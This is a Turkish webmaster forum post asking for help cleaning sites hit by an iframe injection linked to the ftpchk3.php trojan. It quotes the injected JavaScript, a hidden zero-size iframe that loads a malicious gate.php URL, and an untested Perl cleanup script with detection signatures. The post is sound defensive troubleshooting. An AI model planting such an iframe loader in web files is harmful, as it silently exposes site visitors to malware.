iframe virüsü & ftpchk3.php temizleme

Selam Arkadaşlar

yaklaşık 40 günden beridir sunucumdaki sitelerin hemen hepsi <iframe> virüsü ile tanışmış bulunmakta. Bu virüs ile ilgili olarak normal prosedürlerin hepsini yerine getirmeme rağmen, Sitemdeki Hit düşüşünün nedenlerini Araştırırken Google web master araçlarından önizleme yaptırdığımda getirme hataları arasında şu adrese denk geldim "http://bigdeal777.com/gate.php?f=977533&r". bununla ilgili kısa bir google araştırmasından sonra sadece .php .html dosyalarına değil .js dosyalarınada bulaştığını gördüm :S. olası bütün yazma izinlerini kaldırmış olmama ve ftp şifremi değiştirmeme rağmen halen daha sitemdeki dosyalara bulaşmış olması beni bir hayli ürküttü. bununla ilgili olarak bir başka platformda konu açmış olan bir arkadaştan alıntı yaparak olayı biraz daha açmak istiyorum.
konuyu açan "Cemaliozan" arkadaşımızında aynı sıkıntı başında sanırım. Kendisinin Affına Sığınarak aynen konuyu buraya atıyorum..

Cemaliozan' Alıntı:

Merhaba arkadaşlar ;

Godaddy de 9 yıldır sorunsuz çalışan 8-10 domaini bir arada barındıran Deluxe Hostum var. Root tan başlamak üzere tüm klasör ve dosyalarım salt okumaya (444) ayarlı. Muhtemelen FTP ile yüklediğim iframe virüsü bulaşmış bir dosya zaman zaman başta JavaScript dosyaları olmak üzere domainlere ayrı ayrı girip html,php ve javascript dosyalarını teker teker açıp, dosya izinlerini 777'ye ayarlayarak en son satırına aşağıdaki gibi eklemeler yapıyor.

PHP Kodu:

PHP:

/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
    document.cookie='1=1;expires='+e.toGMTString()+';path=/';
    window.setTimeout(function(){
        var JSinj=document.createElement('iframe');
        //Bu adres satırı değişebiliyor
        JSinj.src='http://bigdeal777.com/gate.php?f=977533&r='+escape(document.referrer||''); 
        JSinj.width='0';
        JSinj.height='0';
        JSinj.frameborder='0';
        JSinj.marginheight='0';
        JSinj.marginwidth='0';
        JSinj.border='0';
        try{
            document.body.appendChild(JSinj);
        }catch(e){
            document.documentElement.appendChild(JSinj);
        }
    }, 2000);
}
/*qpi*/

Tüm host dosyalarını lokale indirdim, kendi bilgisayarımda güncel bir kaç antivirüs ve malware ile taradım. Eklenmiş kodları temizleyip tekrar salt okunura ayarladım. Sağdan soldan alıpta kullandığım kod yoktur. Kodlarımın Bir kaç javascript kodu hariç tamamı bana aittir. Dolayısıyla içlerinde ne olduğunu iyi biliyorum. Veri tabanlarınıda olası bir script/code açığı bakımından kontrol ettim. Herhangi bir aksaklığa rastlamadım.

Yaklaşık 15 gündür internette aramadığım yer kalmadı, sonunda ftpchk3.php isimli bir trojan dosyasının benzer saldırılar yaptığını öğrendim. Bu dosya benim klasörlerimin hiç birinde yok. Godaddy sunucuları bu tür dosyaların bulaşmasına karşı gerekli önlemleri almışlar. (Bir kaç sefer adı ftpchk3.php olan içi boş dosya oluşturup denedim anında silindi.) Fakat her nasılsa benim sorunumu çözemediler.

Bu tip virüsün temizlenmesi ile ilgili olarak bir perl kodu buldum. Hem perl hem php bilgisi olan biri bu kodu php'ye çevirirse memnun olurum. Bu virüsle daha önce uğraşan arkadaşların konu hakkındaki yorum ve çözüm önerilerini bekliyorum.

PERL Kodu :
PHP Kodu:

PHP:

#!/usr/bin/perl
# http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-heked-website.html
use strict;
`grep -Rn aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u * | cut -d ':' -f 1 > listofinfected`;

open FP,"listofinfected";
my $file;
while($file = <FP>){
  print "Testing $file ... ";
  chomp($file);
  if(-e ($file)){
    open VI,$file;
    my @filecon = <VI>;
    close VI;
    
    if($filecon[0] =~ m/aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u/){
      
      $filecon[0] =~ s/(<\?.*?\?>)//g;
      
      rename($file,$file.".infected");
    
      open VI,">$file";
      print VI join('',@filecon);
      close VI;
      
      print $file." Fixed !!";
    }    
  }
  print "\n";
}

close(FP);

`grep -Rn ftpchk3.php * | cut -d ':' -f 1 > listofinfected2`;

open FP,"listofinfected2";
my $file;
while($file = <FP>){
  print "Testing $file ... ";
  chomp($file);
  if(-e ($file)){
    open VI,$file;
    my @filecon = <VI>;
    close VI;
    
    my $fc = join('',@filecon);
    $fc =~ s|document.write('<script(.*?)ftpchk3.php(.*)script>');||sig;
    $fc =~ s|<script[\s]+src="?http(.*?)ftpchk3.php(.*?)script>||sig;
    
  
    
    rename($file,$file.".infected");
    
    open VI,">$file";
    print VI $fc;
    close VI;
    
    print $file." Fixed !!";
  }
  print "\n";
}

close(FP);

Genişletmek için tıkla ...

Kullandığım Sistem WP olduğundan ayrıca; genelde bu virüsün sadece .html ve .php dosyalarına bulaştığını varsayan arkadaşlardan edindiğim "eksik bilgi ile .js dosyalarına baktığımda da kod yapısının farklı olabileceği hiç aklıma gelmediğinden bugün bütün siteleri tekrardan elden geçirmekteyim. Önemle Uyarıyorum Bu virüs sadece .html ve .php yada .asp dosyalarına bulaşmıyor. yazılabilir bütün dosyalara bulaşıyor. .txt de dahil. Virüsü temizleyen arkadaşlar bütün dosyalara baksınlar..

Yukarıdaki Perl in işe yarayıp yaramadığını test etmedim. Perl in alındığı blogta
Nasıl Çalıştığı şu şekilde belirtilmektedir.

How to execute?

Copy paste the code to a file called anti.pl
From the terminal run
perl anti.pl

Burdan benim anladığım yukarıdaki perl kodlarını anti.pl olarak sunucu ana dizininde kaydetmemizi ve puty komut satırından cd /home/ anti.pl olarak çalıştırmamızı söylüyor. (yanlış anlamışta olabilirim bu yüzden denemedim). Benim Merak ettiğim Asıl soru şudu;

Arkadaşımızın Bahsettiği ftpchk3.php isimli dosya ile daha önce karşılaşan ve temizleyen oldumu? Zira kendi Pc imde 4 anti ve 2 malware tarayıcı ile taratıp zararlı görülen bütün dosyaları temizledim. FTP ve root şifrelerimin tamamını değiştirip Sadece manuel olarak giriş yapmaktayım. Fakat buna rağmen halen daha virüs sitelerimde aktif oluyor.

Bu konuda daha önceden bilgisi olan arkadaşların tavsiyelerini bekliyorum. Herkese iyi çalışmalar...